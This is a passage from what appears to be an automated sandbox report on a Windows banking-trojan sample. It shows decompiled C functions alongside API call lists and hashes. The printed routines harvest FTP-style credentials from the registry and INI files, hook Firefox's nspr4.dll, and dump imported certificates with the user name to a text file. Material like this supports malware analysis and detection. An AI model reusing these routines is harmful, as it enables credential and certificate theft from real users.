    					return E00407DEB(0x311, _v28, 0xcb);
    				}
    				_v20 = 0;
    				_v12 = 0x104;
    				if(RegEnumKeyExW(_v8, 0,  &_v700,  &_v12, 0, 0, 0, 0) != 0) {
    					L19:
    					RegCloseKey(_v8);
    					goto L20;
    				} else {
    					do {
    						_t111 = _v16;
    						_v20 = _v20 + 1;
    						_t81 = E00415E26(_v8, _t107, _v16,  &_v700,  &_v64, 0xff);
    						_v12 = _t81;
    						if(_t81 != 0xffffffff && _t81 != 0) {
    							_t89 = E00415E26(_v8, _t107, _t111 + 0x1fe,  &_v700,  &_v52, 0xff);
    							_v12 = _t89;
    							if(_t89 != 0xffffffff && _t89 != 0) {
    								_t113 = _v32;
    								_t93 = E00415E26(_v8, _t107, _t113,  &_v700,  &_v40, 0xff);
    								_v12 = _t93;
    								if(_t93 != 0xffffffff && _t93 != 0) {
    									_t107 = _t113;
    									if(E0041284D(_t113) > 0) {
    										_t114 = E00415EDC(_v8, _t107,  &_v700,  &_v76);
    										if(_t114 < 1 || _t114 > 0xffff) {
    											_t114 = 0x15;
    										}
    										_t121 =  &_v116;
    										_t99 = 0x55;
    										E00419897(_t99,  &_v116);
    										_t101 = _v16;
    										_t107 = _v32;
    										_push(_t114);
    										_push(_t101);
    										_push(_t107);
    										_push(_t101 + 0x1fe);
    										_t115 = _t107 + 0x1fe;
    										_t104 = E004129F1(_t121, 0x311, _t107 + 0x1fe, _t121);
    										_t122 = _t122 + 0x14;
    										if(_t104 > 0) {
    											_t107 =  &_v28;
    											if(E004120F2(_t104,  &_v28, _t115) != 0) {
    												_v24 = _v24 + 1;
    											}
    										}
    									}
    								}
    							}
    						}
    						_v12 = 0x104;
    					} while (RegEnumKeyExW(_v8, _v20,  &_v700,  &_v12, 0, 0, 0, 0) == 0);
    					_t109 = 0;
    					goto L19;
    				}
    			}

    APIs
    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000008,?,?,00000000,00000008), ref: 0040A829
    • RegEnumKeyExW.ADVAPI32 ref: 0040A854
    • RegCloseKey.ADVAPI32(?), ref: 0040A98B
      • Part of subcall function 00415E26: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D7E1,?,?,00000104,.exe,00000000), ref: 00415E3B
    • RegEnumKeyExW.ADVAPI32 ref: 0040A978
      • Part of subcall function 00415E26: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0041D7E1,?,?,00000104), ref: 00415EBC
      • Part of subcall function 00415EDC: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0040E0D2,?,?), ref: 00415EF4
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Open$Enum$CloseEnvironmentExpandStrings
    • String ID:
    • API String ID: 2343474859-0
    • Opcode ID: 3d27843492d9b5d17fb572f72e15994caae7e93853112907e98e913cd83baa26
    • Instruction ID: a3e1b024a66d4833fbba4adc0a1bbc47c41d42d1ba9eb757639a0d01d0f76559
    • Opcode Fuzzy Hash: 3d27843492d9b5d17fb572f72e15994caae7e93853112907e98e913cd83baa26
    • Instruction Fuzzy Hash: 325131B2E00209ABDB10ABA5CD45AEFBBBCEF44304F11057AB505F3291D7349E958B65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E0040EFFA(void* __eflags, intOrPtr _a4) {
    				signed int _v5;
    				short _v20;
    				char _v40;
    				char _v60;
    				short _v84;
    				char _v112;
    				char _v144;
    				short _v664;
    				char _v1184;
    				short _v1704;
    				char _v2224;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t31;
    				long _t33;
    				void* _t36;
    				void* _t42;
    				void* _t44;
    				void* _t46;
    				long _t50;
    				short* _t58;
    				char* _t65;
    				short _t66;
    				void* _t67;
    				WCHAR* _t70;
    				long _t77;
    
    				_t31 = 0x2a;
    				E00419897(_t31,  &_v144);
    				_t33 =  &_v1184;
    				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t33);
    				if(_t33 == 0) {
    					_t33 = E00417593( &_v144,  &_v1184,  &_v1184);
    					if(_t33 != 0) {
    						_t36 = 0x2c;
    						E00419897(_t36,  &_v112);
    						_t33 = E00417593( &_v112,  &_v1704,  &_v1184);
    						if(_t33 != 0) {
    							_t33 = GetFileAttributesW( &_v1704);
    							if(_t33 != 0xffffffff) {
    								_t42 = 0x2d;
    								E00419897(_t42,  &_v60);
    								_t44 = 0x2e;
    								E00419897(_t44,  &_v84);
    								_t46 = 0x2f;
    								E00419897(_t46,  &_v20);
    								_v5 = 0;
    								while(1) {
    									_push(_v5 & 0x000000ff);
    									_push( &_v60);
    									_t67 = 0xa;
    									_t70 =  &_v40;
    									_t50 = E004129F1( &_v60, _t67, _t70);
    									if(_t50 < 1) {
    										break;
    									}
    									_t50 = GetPrivateProfileIntW(_t70,  &_v84, 0xffffffff,  &_v1704);
    									_t77 = _t50;
    									if(_t77 == 0xffffffff) {
    										break;
    									}
    									_t50 = GetPrivateProfileStringW(_t70,  &_v20, 0,  &_v664, 0x104,  &_v1704);
    									if(_t50 == 0) {
    										L17:
    										_v5 = _v5 + 1;
    										if(_v5 < 0xfa) {
    											continue;
    										}
    										break;
    									}
    									_t58 =  &_v664;
    									if(_v664 == 0) {
    										L12:
    										if(_t77 != 1) {
    											_t65 =  &_v664;
    											L16:
    											_t50 = E0040F181(0, _t65, _a4, _t90);
    											if(_t50 == 0) {
    												break;
    											}
    											goto L17;
    										}
    										_t50 = E00417593( &_v664,  &_v2224,  &_v1184);
    										_t90 = _t50;
    										if(_t50 == 0) {
    											goto L17;
    										}
    										_t65 =  &_v2224;
    										goto L16;
    									} else {
    										goto L9;
    									}
    									do {
    										L9:
    										if( *_t58 == 0x2f) {
    											_t66 = 0x5c;
    											 *_t58 = _t66;
    										}
    										_t58 = _t58 + 2;
    									} while ( *_t58 != 0);
    									goto L12;
    								}
    								return _t50;
    							}
    						}
    					}
    				}
    				return _t33;
    			}

    APIs
    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 0040F021
      • Part of subcall function 00417593: PathCombineW.SHLWAPI(0041C47F,0041C47F,?,0041C47F,?,?), ref: 004175B2
    • GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0040F075
    • GetPrivateProfileIntW.KERNEL32 ref: 0040F0D8
    • GetPrivateProfileStringW.KERNEL32 ref: 0040F104
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: PathPrivateProfile$AttributesCombineFileFolderString
    • String ID:
    • API String ID: 1702184609-0
    • Opcode ID: 525e73140843efe44c2258624908c0112321cc801af889f4f02a6cbb45d57449
    • Instruction ID: b5dc4d3ecca20331a5fa833f2d83eafdec50c2342f6b4401e5cf8c1e226c71d5
    • Opcode Fuzzy Hash: 525e73140843efe44c2258624908c0112321cc801af889f4f02a6cbb45d57449
    • Instruction Fuzzy Hash: E8418F72A00218AADF20EAA4DC45EDF777CAB45314F0005B7F548FB1D1D7789E898A58
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CoCreateInstance.OLE32(004015B0,00000000,00004401,004015A0,?,?,?,?,?,?,?,?,?,0040873D,?,?), ref: 004181C7
    • #8.OLEAUT32(?,?,?,?,?,?,?,?,?,0040873D,?,?), ref: 00418213
    • #2.WS2_32(?,?,?,?,?,?,?,?,?,0040873D,?,?), ref: 00418223
    • #9.OLEAUT32(?,?,?,?,?,?,?,?,?,?,0040873D,?,?), ref: 0041825C
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: CreateInstance
    • String ID:
    • API String ID: 542301482-0
    • Opcode ID: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
    • Instruction ID: c29562c6fbf516a1048cc6eb384817298c08faf3d7c49e293bf34a62fde5a1e6
    • Opcode Fuzzy Hash: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
    • Instruction Fuzzy Hash: 8F218571900614AFCB11DBA5CCCCEEF7BB8EF0A750F1006A5F906EB251D6759940CB95
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00417CC5(signed int __edx, void** __esi, void* _a4, signed int _a8) {
    				char _v5;
    				long _v12;
    				void _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _t26;
    				signed int _t29;
    				signed int _t46;
    				void** _t48;
    
    				_t48 = __esi;
    				_t46 = __edx;
    				_v5 = 0;
    				if(_a8 <= 0xa00000) {
    					_t26 = E0041700D( *__esi);
    					_v36 = _t26;
    					_v32 = _t46;
    					if((_t26 & _t46) != 0xffffffff && E00416FED( *__esi, 0, 0, 2) != 0) {
    						_t29 = E0041700D( *__esi);
    						_v28 = _t29;
    						_v24 = _t46;
    						if((_t29 & _t46) != 0xffffffff) {
    							E00411DB1( &_v20,  &_v20, 0, 5);
    							_v20 = __esi[4] ^ _a8;
    							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, _a8,  &_v12, 0) == 0 || _v12 != _a8) {
    								E00416FED( *_t48, _v28, _v24, 0);
    								SetEndOfFile( *_t48);
    							} else {
    								_v5 = 1;
    							}
    						}
    						FlushFileBuffers( *_t48);
    						E00416FED( *_t48, _v36, _v32, 0);
    					}
    				}
    				return _v5;
    			}

    APIs
      • Part of subcall function 0041700D: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,00000000,00000000), ref: 00417022
      • Part of subcall function 00416FED: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00417C9E,?,00000000,00000000,00000000,00000000), ref: 00416FFF
    • WriteFile.KERNEL32(?,?,00000005,00000000,00000000,?,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 00417D46
    • WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 00417D5F
    • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00417D83
    • FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 00417D8B
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: File$PointerWrite$BuffersFlush
    • String ID:
    • API String ID: 1289656144-0
    • Opcode ID: f7fbc59b6b90ab0a214ec322655bb0973e4cac2b87adba9fbe0841b9a5ffe174
    • Instruction ID: e2b55f125aa1174b5332cf67c956d17a8ba289089a33faf87ad9ed1c416d1d8b
    • Opcode Fuzzy Hash: f7fbc59b6b90ab0a214ec322655bb0973e4cac2b87adba9fbe0841b9a5ffe174
    • Instruction Fuzzy Hash: F9318E7680420DEFDF119FA4DC41EEEBBB9BF08348F14452AF190A1164D73A8995DB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00406D5A(void* __ebx, void* __ecx) {
    				char _v20;
    				char* _v84;
    				char _v92;
    				char _v196;
    				char _v716;
    				void* __edi;
    				void* __esi;
    				void* _t15;
    				void* _t31;
    				void* _t35;
    				void* _t36;
    				char _t37;
    				void** _t43;
    
    				_t36 = __ecx;
    				_t35 = __ebx;
    				_t15 =  *(__ebx + 0x180);
    				if(_t15 == 0 || WaitForSingleObject(_t15, 0) != 0x102) {
    					_t43 = _t35 + 0x17c;
    					E0041370D(_t43);
    					E0041CD51(_t36,  &_v716, _t43, 1);
    					E0041C9FB(0x2937498d,  &_v196, 0);
    					_t37 = 0x44;
    					E00411DB1( &_v92,  &_v92, 0, _t37);
    					_v92 = _t37;
    					_v84 =  &_v196;
    					ResetEvent( *(_t35 + 0xc));
    					if(E004135C5( &_v716, 0x4030d4, 0,  &_v92,  &_v20) != 0) {
    						E00411D3A(_t43,  &_v20, 0x10);
    						if(WaitForSingleObject( *(_t35 + 0xc), 0x3e8) == 0) {
    							goto L6;
    						} else {
    							TerminateProcess( *_t43, 0);
    							E0041370D(_t43);
    							goto L3;
    						}
    					} else {
    						L3:
    						_t31 = 0;
    					}
    				} else {
    					L6:
    					_t31 = 1;
    				}
    				return _t31;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00406D72
    • ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 00406DCC
    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,00000010,?,004030D4,00000000,?,?), ref: 00406E08
    • TerminateProcess.KERNEL32(?,00000000), ref: 00406E15
      • Part of subcall function 0041370D: CloseHandle.KERNEL32(00000000,0001FDA6,0040BB5B,00000000,00422918,00000000,0040BC8D,00000000,00000000), ref: 0041371C
      • Part of subcall function 0041370D: CloseHandle.KERNEL32(00000000,0001FDA6,0040BB5B,00000000,00422918,00000000,0040BC8D,00000000,00000000), ref: 00413725
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: CloseHandleObjectSingleWait$EventProcessResetTerminate
    • String ID:
    • API String ID: 401097067-0
    • Opcode ID: 9738a14c694ee6551965841c5ab12fcfeb4589d8a8b9a83c763b065ebb7eda9e
    • Instruction ID: 3c1aa04e7d7e7f4ab942308506662c5ea5cc4bd0a055a61fc7e92bc5a9463e46
    • Opcode Fuzzy Hash: 9738a14c694ee6551965841c5ab12fcfeb4589d8a8b9a83c763b065ebb7eda9e
    • Instruction Fuzzy Hash: 8E11A571500205ABDB10AFA5DC49FEF7BBDEF40704F00457AF905F60A5DA389A85CA68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 64%
    			E00410713(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
    				void* __edi;
    				void* _t12;
    				intOrPtr _t13;
    				void* _t16;
    				void* _t17;
    				void* _t21;
    				void* _t22;
    				void* _t23;
    				intOrPtr _t24;
    				void* _t28;
    				intOrPtr* _t29;
    				intOrPtr _t31;
    
    				if(E0041CB59() != 0) {
    					_t29 = _a16;
    					_t24 = _a12;
    					_t12 =  *0x423b94(_a4, 0, _t24, _t29, _t23, _t28, _t17);
    					_t13 =  *0x423b90(_a4, _a8, _t24, _t29);
    					_a4 = _t13;
    					if(_t12 < 0 && _t13 >= 0 && _t29 != 0 &&  *_t29 != 0 && _t24 != 0) {
    						EnterCriticalSection(0x422b2c);
    						if(( *0x422b44 & 0x00000001) == 0) {
    							_t31 =  *_t29;
    							if(lstrcmpiW( *(_t24 + 4), L"nspr4.dll") != 0) {
    								_t16 = 0;
    							} else {
    								_t16 = E00404F3F(_t21, _t22, _t31);
    							}
    							if(_t16 != 0) {
    								 *0x422b44 =  *0x422b44 | 0x00000001;
    							}
    						}
    						LeaveCriticalSection(0x422b2c);
    					}
    					return _a4;
    				}
    				goto ( *0x423b90);
    			}

    APIs
      • Part of subcall function 0041CB59: WaitForSingleObject.KERNEL32(00000000,00419A59,19367401,00000001), ref: 0041CB61
    • EnterCriticalSection.KERNEL32(00422B2C), ref: 0041076A
    • lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 00410784
    • LeaveCriticalSection.KERNEL32(00422B2C), ref: 004107A5
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterLeaveObjectSingleWaitlstrcmpi
    • String ID: nspr4.dll
    • API String ID: 3081114022-741017701
    • Opcode ID: 407d70449565d54b75f2aaf72172146937e094d39cdc2e0bfa7857c38504335e
    • Instruction ID: f712b93b93d2c4d633cdd65f6f1a6689b77f217632ac9426d212a66442553e8c
    • Opcode Fuzzy Hash: 407d70449565d54b75f2aaf72172146937e094d39cdc2e0bfa7857c38504335e
    • Instruction Fuzzy Hash: 2111C439200205EBCB204F11AD48BE77F68EF45355F04002AFD58572A2C7B8B8D2CE98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041546B(HANDLE* _a4) {
    				struct tagMSG _v28;
    				long _t16;
    
    				while(1) {
    					_t16 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4ff);
    					if(_t16 != 1) {
    						break;
    					}
    					while(PeekMessageW( &_v28, 0, 0, 0, 1) != 0) {
    						if(_v28.message != 0x12) {
    							TranslateMessage( &_v28);
    							DispatchMessageW( &_v28);
    							continue;
    						}
    						goto L5;
    					}
    				}
    				L5:
    				return _t16;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: MessageMultipleObjectsPeekWait
    • String ID:
    • API String ID: 3986374578-0
    • Opcode ID: 10db4ceb0b99e240a6431a23ca852af127ceca0bedce08fe67b91c423f0e8d48
    • Instruction ID: 78f504e82113b3e43b71747f4f98a3c45b57dc40824475f2458ebcf5b96ccdb7
    • Opcode Fuzzy Hash: 10db4ceb0b99e240a6431a23ca852af127ceca0bedce08fe67b91c423f0e8d48
    • Instruction Fuzzy Hash: 55F0FC32504319BFD710AEA9DD48EE7BB9CEB85355F040536F604D2171D179988486B5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00419A3E(void* __eflags) {
    				void* _t1;
    				long _t6;
    				void* _t12;
    
    				_t1 = E0041CA33(_t12, 0x19367401, 1);
    				_t19 = _t1;
    				if(_t1 != 0) {
    					if(E0041CB59() == 0) {
    						L7:
    						E004154D1(_t19);
    						return 0;
    					}
    					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
    					_t6 = WaitForSingleObject( *0x424024, 0x1388);
    					while(_t6 == 0x102) {
    						E0040647F();
    						_t6 = WaitForSingleObject( *0x424024, 0x1388);
    					}
    					goto L7;
    				}
    				return _t1 + 1;
    			}

    APIs
      • Part of subcall function 0041CA33: CreateMutexW.KERNEL32(00423B98,00000000,?,?,?,?,?), ref: 0041CA54
    • GetCurrentThread.KERNEL32 ref: 00419A62
    • SetThreadPriority.KERNEL32(00000000,?,?,?,19367401,00000001), ref: 00419A69
    • WaitForSingleObject.KERNEL32(00001388,?,?,?,19367401,00000001), ref: 00419A81
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Thread$CreateCurrentMutexObjectPrioritySingleWait
    • String ID:
    • API String ID: 3441234504-0
    • Opcode ID: 255fdd34acbe11715fb23278fb684a887b20837a33d700de9881c31b0e607634
    • Instruction ID: ae17521ab487d1678e795c368ceb53b64926216367371be20ce7ff7c94018088
    • Opcode Fuzzy Hash: 255fdd34acbe11715fb23278fb684a887b20837a33d700de9881c31b0e607634
    • Instruction Fuzzy Hash: DBF09E326041496FD71173B05D55FEB3A5CDF843D5720003BFA02E21A2C8394CC642BC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00413373(intOrPtr _a4) {
    				intOrPtr _v20;
    				void* _v32;
    				signed int _t6;
    				signed int _t7;
    				int _t9;
    				int _t14;
    				void* _t15;
    
    				_t14 = 0;
    				_t6 = CreateToolhelp32Snapshot(4, 0);
    				_t15 = _t6;
    				_t7 = _t6 | 0xffffffff;
    				if(_t15 != _t7) {
    					_v32 = 0x1c;
    					_t9 = Thread32First(_t15,  &_v32);
    					while(_t9 != 0) {
    						if(_v20 == _a4) {
    							_t14 = _t14 + 1;
    						}
    						_t9 = Thread32Next(_t15,  &_v32);
    					}
    					CloseHandle(_t15);
    					return _t14;
    				}
    				return _t7;
    			}

    APIs
    • CreateToolhelp32Snapshot.KERNEL32 ref: 00413380
    • Thread32First.KERNEL32 ref: 0041339B
    • Thread32Next.KERNEL32 ref: 004133B1
    • CloseHandle.KERNEL32(00000000), ref: 004133BC
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
    • String ID:
    • API String ID: 3643885135-0
    • Opcode ID: 79fe4a6f05112d4bd9b8c6826af499282d638a22b5f7514bf2c623fae5ff0845
    • Instruction ID: 7cef4bd21420589aea3bace5b479b33f506f2ac09347e5ed659147de83ab01df
    • Opcode Fuzzy Hash: 79fe4a6f05112d4bd9b8c6826af499282d638a22b5f7514bf2c623fae5ff0845
    • Instruction Fuzzy Hash: 97F05475500119ABDB106F65DC48DEF7BBCEB85361B004162FD22E2194DB38DA45C6BD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 60%
    			E004055A4(intOrPtr __eax, void* __ecx, intOrPtr* _a4, intOrPtr* _a8, signed int _a12) {
    				char _v536;
    				char _v600;
    				char _v728;
    				char _v744;
    				struct _SYSTEMTIME _v760;
    				intOrPtr _v764;
    				intOrPtr _v772;
    				intOrPtr _v776;
    				char _v784;
    				void* __edi;
    				void* __esi;
    				void* _t47;
    				void* _t58;
    				intOrPtr* _t59;
    				void* _t61;
    				void* _t65;
    				intOrPtr* _t66;
    				void* _t67;
    				void* _t71;
    				char* _t74;
    				signed int _t76;
    				void* _t78;
    				void* _t79;
    
    				_t61 = __ecx;
    				_t78 = (_t76 & 0xfffffff8) - 0x2fc;
    				_t59 = _a4;
    				__imp__PFXImportCertStore(_t59, _a8, _a12, _t67, _t71, _t58);
    				_v776 = __eax;
    				if(__eax != 0 && (_a12 & 0x10000000) == 0 && _t59 != 0 &&  *_t59 > 0 &&  *((intOrPtr*)(_t59 + 4)) != 0 && E0041CB59() != 0) {
    					GetSystemTime( &_v760);
    					E00419897(0xaa,  &_v600);
    					_t74 =  &_v744;
    					E00419897(0xab, _t74);
    					E00405383( &_v536, _t61);
    					_push(_v760.wYear & 0x0000ffff);
    					_push(_v760.wMonth & 0x0000ffff);
    					_push(_v760.wDay & 0x0000ffff);
    					_push(_t74);
    					_push( &_v536);
    					_push( &_v600);
    					_t65 = 0x3e;
    					_t47 = E004129F1( &_v600, _t65,  &_v728);
    					_t79 = _t78 + 0x18;
    					if(_t47 > 0 && E00407B20(_t61, _t65, 2, 0,  &_v728,  *((intOrPtr*)(_t59 + 4)),  *_t59) != 0) {
    						_t66 = _a8;
    						if(_t66 != 0 &&  *_t66 != 0) {
    							 *((short*)(E00411D3A(_t79 + 0x48 + E0041284D( &_v728) * 2, L".txt", 8) + 8)) = 0;
    							_t64 = _t66;
    							if(E00412B55(_t52 | 0xffffffff, _t66,  &_v784) != 0) {
    								E00407B20(_t64, _t66, 2, 0,  &_v728, _v772, _v764);
    								E00412B43( &_v784);
    							}
    						}
    					}
    				}
    				return _v776;
    			}

    APIs
    • PFXImportCertStore.CRYPT32(?,?,?), ref: 004055BD
      • Part of subcall function 0041CB59: WaitForSingleObject.KERNEL32(00000000,00419A59,19367401,00000001), ref: 0041CB61
    • GetSystemTime.KERNEL32(?), ref: 00405609
      • Part of subcall function 00405383: GetUserNameExW.SECUR32(00000002,?,?), ref: 00405398
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: CertImportNameObjectSingleStoreSystemTimeUserWait
    • String ID: .txt
    • API String ID: 1412380219-2195685702
    • Opcode ID: 2697c63c61a5594fa9dde59ba6d634cb93e8aed94b133e909efdec1fc6a016eb
    • Instruction ID: c24e941ba6854cd44b86739ea1cbf8b0ae9c8150a9786ca286445517a81dfd31
    • Opcode Fuzzy Hash: 2697c63c61a5594fa9dde59ba6d634cb93e8aed94b133e909efdec1fc6a016eb
    • Instruction Fuzzy Hash: 5631D2311047419BCB20AF55CD45BAFB7A8EF88354F80092FFA48A72D1D7B9D944CB6A
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CoCreateInstance.OLE32(0040315C,00000000,00004401,0040316C,?), ref: 004080A8
    • CoCreateInstance.OLE32(0040312C,00000000,00004401,0040313C,?), ref: 004080FB
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: CreateInstance
    • String ID: D
    • API String ID: 542301482-2746444292
    • Opcode ID: 2819d2fab729000be82d0e02369a6c9a25e8454bcafbd5f4b901769a36fe3f0e
    • Instruction ID: 88765526117be33de3586bc452c96885893a58124429bd89a7740fa52d40efe5
    • Opcode Fuzzy Hash: 2819d2fab729000be82d0e02369a6c9a25e8454bcafbd5f4b901769a36fe3f0e
    • Instruction Fuzzy Hash: 81316DB2204305AFD710DF64CD85D6BB7ECAF84744F10052EF994AB280EB34DD068BA6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E0041635B(void* __ecx, intOrPtr _a4, intOrPtr _a12, signed char _a16) {
    				char _v268;
    				char _v280;
    				char _v284;
    				signed int _v290;
    				signed int _v292;
    				signed int _v296;
    				unsigned int _t24;
    				void* _t26;
    				signed int _t28;
    				char* _t29;
    				void* _t30;
    				void* _t41;
    				char* _t42;
    				void* _t46;
    				signed int _t50;
    				void* _t51;
    				signed int _t52;
    				void* _t54;
    
    				_t54 = (_t52 & 0xfffffff8) - 0x118;
    				_t46 = __ecx;
    				_t24 = E00411D3A( &_v284, _a4, 0x10);
    				_v296 = _v296 ^ _t24;
    				_v292 = _v292 ^ _t24;
    				_v290 = _v290 ^ _t24 >> 0x00000010;
    				_t41 = 0;
    				_t26 = 0;
    				do {
    					 *(_t54 + _t41 + 0x10) =  *(_t54 + _t41 + 0x10) ^  *(_t51 + _t26 + 0xc);
    					_t26 = _t26 + 1;
    					if(_t26 == 4) {
    						_t26 = 0;
    					}
    					_t41 = _t41 + 1;
    				} while (_t41 < 8);
    				if(_a12 != 0) {
    					E00411D3A( &_v268, _a12, 0x102);
    					E0041317A( &_v280, _t41,  &_v296, 0x10);
    				}
    				_t28 = _a16 & 0x000000ff;
    				if(_t28 != 0) {
    					_t30 = _t28 - 1;
    					if(_t30 == 0) {
    						_t42 = L"Local\\";
    						_push(6);
    						goto L11;
    					} else {
    						if(_t30 == 1) {
    							_t42 = L"Global\\";
    							_push(7);
    							L11:
    							_pop(_t50);
    							E0041209F(_t50, _t42, _t46);
    							_t46 = _t46 + _t50 * 2;
    						}
    					}
    				}
    				_t29 =  &_v284;
    				__imp__StringFromGUID2(_t29, _t46, 0x28);
    				return _t29;
    			}






















    APIs
    • StringFromGUID2.OLE32(?,2937498D,00000028,?,?,00000010,00000000,00020016), ref: 00416401
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: FromString
    • String ID: Global\$Local\
    • API String ID: 1694596556-639276846
    • Opcode ID: 4e05cb8383acf920586fbfa06569b2829002de3e21291a79f6ec32e47e29196a
    • Instruction ID: 2f4c39f4f6c3a60c76e0a3bb36a5417527b83b7cf64943caefc6f6a756ac4eac
    • Opcode Fuzzy Hash: 4e05cb8383acf920586fbfa06569b2829002de3e21291a79f6ec32e47e29196a
    • Instruction Fuzzy Hash: FF11033221434967C714DF788806BEF3798EB84314F008D2FFAA2D61C1DAB8D594C79A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E00409DD7(void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v52;
    				char _v572;
    				void* __edi;
    				void* __esi;
    				char* _t22;
    				signed int _t30;
    				char* _t32;
    				void* _t34;
    
    				_t32 =  &_v52;
    				E00419897(0x81, _t32);
    				_v16 = _t32;
    				_v28 = 0x26;
    				_v24 = 0x1a;
    				_v20 = 0x23;
    				E00411DB1( &_v12,  &_v12, 0, 8);
    				_t30 = 0;
    				do {
    					_t22 =  &_v572;
    					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
    					_t37 = _t22;
    					if(_t22 == 0) {
    						_t29 =  &_v16;
    						E00417437( &_v572,  &_v16, _t37, 1, 2, E00409B3C,  &_v12, 0, 0, 0);
    					}
    					_t30 = _t30 + 1;
    				} while (_t30 < 3);
    				if(_v8 <= 0) {
    					return E00411CFE(_v12);
    				}
    				return E00407DEB(_t29, _v12, 0xcb);
    			}


















    APIs
    • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00409E27
